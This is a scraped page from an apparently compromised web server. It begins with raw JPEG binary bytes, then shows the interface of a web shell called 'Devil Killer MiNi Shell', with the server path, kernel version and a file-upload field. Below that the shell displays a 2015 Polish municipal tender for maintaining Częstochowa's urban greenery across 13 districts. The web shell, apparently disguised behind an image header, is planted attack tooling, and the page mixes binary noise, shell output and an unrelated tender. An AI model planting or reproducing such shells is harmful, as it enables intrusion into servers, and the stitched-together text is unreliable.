JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150130/21558-N-2015.html

<p class="kh_header"><b>Częstochowa: Kompleksowe utrzymanie zieleni miejskiej w Częstochowie w latach 2015-2017
na łącznym obszarze ok. 264 ha w podziale na 13 rejonów.</b><br>
<b>Numer ogłoszenia: 21558 - 2015; data zamieszczenia: 30.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe utrzymanie zieleni miejskiej w Częstochowie w latach 2015-2017
na łącznym obszarze ok. 264 ha w podziale na 13 rejonów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowe utrzymanie zieleni miejskiej w Częstochowie w latach 2015-2017
na łącznym obszarze ok. 264 ha w podziale na 13 rejonów: 
Rejon I-CENTRUM - pow. ok. 17 ha,Rejon II -PÓŁNOC	-pow. ok. 24 ha,Rejon III  -	KOMPLEKS PROMENADA	-pow. ok. 26 ha,Rejon IV  -	GRABÓWKA	-pow. ok. 22 ha,
Rejon V  -	ZAWODZIE	-pow. ok. 17 ha,Rejon VI  -RAKÓW	-pow. ok. 21 ha
Rejon VII -	PARKI PODJASNOGÓRSKIE- pow. ok. 12 ha,Rejon VIII 	-DK-1	-pow. ok. 19 ha,Rejon IX  -LAS ANIOŁOWSKI-pow. ok. 18 ha, Rejon X  - PARKITKA -   pow. ok. 24 ha,Rejon XI     -   STRADOM-     pow. ok. 23 ha, Rejon XII - WRZOSOWIAK  -   pow. ok. 20 ha,Rejon XIII   -  WYCZERPY   -    pow. ok. 21 ha     
Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.
Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 7, 7a, 8, 8a, 9, 9a, 10, 10a, 11, 11a, 12, 12a, 13, 13a, 14, 14a, 15, 15a, 16, 16a, 17, 17a, 18,18a, 19, 19a do specyfikacji. Powyższe dokumenty wraz ze SIWZ stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w zakresie zgodnym co do rodzaju z przedmiotem zamówienia w szczególności polegające na koszeniu trawników, grabieniu liści,pielęgnacji nowo posadzonych krzewów,drzew i bylin.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium.
Wadium ustala się w wysokości:
Rejon I	-	CENTRUM   	- 9000 zł
Rejon II   	-	PÓŁNOC	- 6000 zł
Rejon III     -	KOMPLEKS  PROMENADA     - 7000 zł
Rejon IV  	-	GRABÓWKA	- 4500 zł	
Rejon V    	-	ZAWODZIE	- 4900 zł	
Rejon VI  	-	RAKÓW	- 5500 zł
Rejon VII 	-	PARKI PODJASNOGÓRSKIE	- 4000 zł
Rejon VIII 	-	DK-1	- 6000 zł
Rejon IX 	-	LAS ANIOŁOWSKI	- 1300 zł
Rejon X      -      PARKITKA    - 6000 zł
Rejon XI     -       STRADOM - 4800 zł
Rejon XII    -  WRZOSOWIAK   - 6000 zł
Rejon XIII   - WYCZERPY     - 5500 zł
Wadium należy wnieść w terminie do dnia 12.03.2015 r. do godz. 09:30</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy udokumentują wykonanie lub wykonywanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług polegających na pielęgnacji zieleni urządzonej na terenach publicznie dostępnych (urządzone tereny zieleni miejskiej, osiedlowej oraz otwarte publicznie dostępne urządzone tereny zieleni przyzakładowej, przyszkolnej, towarzyszącej urzędom, instytucjom użyteczności publicznej i obiektom sakralnym, handlowym i biurowym, w zakres których wchodziły między innymi: koszenie trawników, sadzenie roślin, wraz z pielęgnacją po posadzeniu, pielęgnacja kwietników lub grup krzewów i drzew, w tym cięcia pielęgnacyjne. 
Powyższy warunek zostanie spełniony, jeżeli wykonawca zrealizował w jednym lub kilku zamówieniach ww. usługi o łącznej wartości min. 100.000,00 zł brutto.
UWAGA:
Powyższy warunek dotyczy wszystkich rejonów: I-XIII.
W przypadku usług, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia usług (w przypadku usług rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.:
a)min. 1 osobą, która będzie pełnić funkcję kierownika robót z uprawnieniami
do kierowania pracami w  zorganizowanej zieleni zabytkowej, posiadającą
wykształcenie i praktykę zawodową wymaganą w § 23 ust. 1 Rozporządzenia
Ministra Kultury i Dziedzictwa Narodowego z  dnia 27 lipca 2011 r. w sprawie
prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań
konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym
do rejestru zabytków oraz badań archeologicznych (Dz. U. z dnia 11 sierpnia 2011 r.,
Nr 165, poz. 987) lub posiadająca kwalifikacje o których mowa w § 31 ww.
Rozporządzenia oraz
b)min. 2 osobami wykonującymi prace techniczne z uprawnieniami do  wykonania prac w zorganizowanej zieleni zabytkowej zgodnie z rozporządzeniem jak wyżej, tj. posiadającymi uprawnienia, o których mowa w § 23 ust. 2 lub posiadają kwalifikacje o których mowa w § 31 ww. rozporządzenia.
UWAGA:
Powyższy warunek dotyczy tylko rejonu VII - Parki Podjasnogórskie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W uzupełnieniu do punktu III.4.1) niniejszego ogłoszenia należy przedłożyć:
1.1. Wykaz usług wykonanych lub wykonywanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, spełniających wymagania określone w punkcie 5.3. specyfikacji istotnych warunków zamówienia, sporządzony przez wykonawce według załącznika nr 4 do specyfikacji oraz dowody dotyczące usług wymienionych w ww. wykazie określające czy usługi zostały wykonane należycie, tzn.poświadczenie np. referencje albo - oświadczenie wykonawcy  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.  W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. 
2. Wymagania dotyczące dokumentów, określonych w punktach od 6.1. do 6.3. specyfikacji istotnych warunków zamówienia: 
2.1. W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenie z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę, jak i na każdego ze wspólników. 
2.2.Dokumenty o których mowa w punktach 6.1.e), 6.2.a) i 6.3.a) winny być złożone w oryginale. Dokumenty o których mowa w punktach 6.1.b), 6.1.c), 6.1.d), 6.1.f), 6.1.g) i 6.1.h) winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę  uprawniona  do składania oświadczeń woli w imieniu wykonawcy.
Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. 
2.3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to:1) zamiast dokumentów, o których mowa w punktach 6.1.b), 6.1.c), 6.1.d) i  6.1.g)  specyfikacji, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2) zamiast dokumentów, o których mowa w punktach 6.1.f) i 6.1.h) specyfikacji składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 do 8, 10 i 11
ustawy Prawo zamówień publicznych. Dokumenty, o których mowa w podpunktach 1)a) i 1)c) oraz w podpunkcie 2),powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert. Dokumenty, o których mowa w podpunkcie 1)b), powinny być
wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunktach 1)a) i 1)b), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji
wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis podpunktu 2) stosuje
się odpowiednio.
2.4.Jeżeli wykonawca ma siedzibę na terytorium Rzeczypospolitej Polskiej, a  osoby, o których mowa w art. 24 ust. 1 pkt 5 do 8, 10 i 11 Prawa zamówień publicznych, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu  sądowego albo administracyjnego miejsca zamieszkania, dotyczące  niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5 do 8, 10 i 11 Prawa zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń  zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania tych osób lub przed notariuszem.
2.5 przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilna, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć dokumenty wymienione w punkcie 6.1. SIWZ (lub w punkcie 6.4.2. SIWZ - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wraz z dokumentami wymienionymi w punkcie 6.1.a) i 6.1.e) SIWZ). Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
Wspólnicy ponoszą solidarna odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określone w art. 366 Kodeksu cywilnego.
2.6.Zgodnie z art. 26 ust. 2b ustawy Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ww. zobowiązanie musi być przedstawione w oryginale.
Zamawiający wymaga podania przez wykonawcę nazw firm podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 
2.7.W przypadku wykonawców wspólnie ubiegających się o zamówienie oraz w przypadku, gdy wykonawca wykazując spełnianie warunków, o których mowa w punktach 5.2 oraz 5.3 SIWZ, polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów muszą być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
3.Inne dokumenty wymagane przez zamawiającego:
a)Wypełniony druk OFERTA, zawierający oświadczenie, że wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz informację, czy wykonawca należy do grupy kapitałowej, stanowiący załącznik nr 2 do specyfikacji istotnych warunków zamówienia.
b)wypełnione przedmiary robót stanowiące załączniki nr 7a, 8a, 9a, 10a, 11a, 12a, 13a, 14a, 15a, 16a, 17a, 18a, 19a  do niniejszej specyfikacji (maksymalnie dla dwóch, wybranych przez Wykonawcę, rejonów).
UWAGA: Wykonawcy, których oferty zostaną uznane za najkorzystniejsze zobowiązani będą, najpóźniej w ciągu 7 dni po podpisaniu umowy, do złożenia szczegółowej kalkulacji cen podanych w ofercie pod groźbą rozwiązania umowy z winy Wykonawcy.
c) Dowód wpłaty wadium.
Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Finansowanie zadania odbywać się będzie do wysokości środków zabezpieczonych w budżecie Miasta Częstochowy i w związku z tym Zamawiający zastrzega sobie prawo ograniczenia zakresu usług do wysokości środków przewidzianych na realizację przedmiotowej usługi.
b) W przypadku urzędowej zmiany stawki podatku VAT, strony umowy zobowiązują się do podpisania aneksu do umowy, regulującego wysokość podatku VAT i ceny brutto umowy.
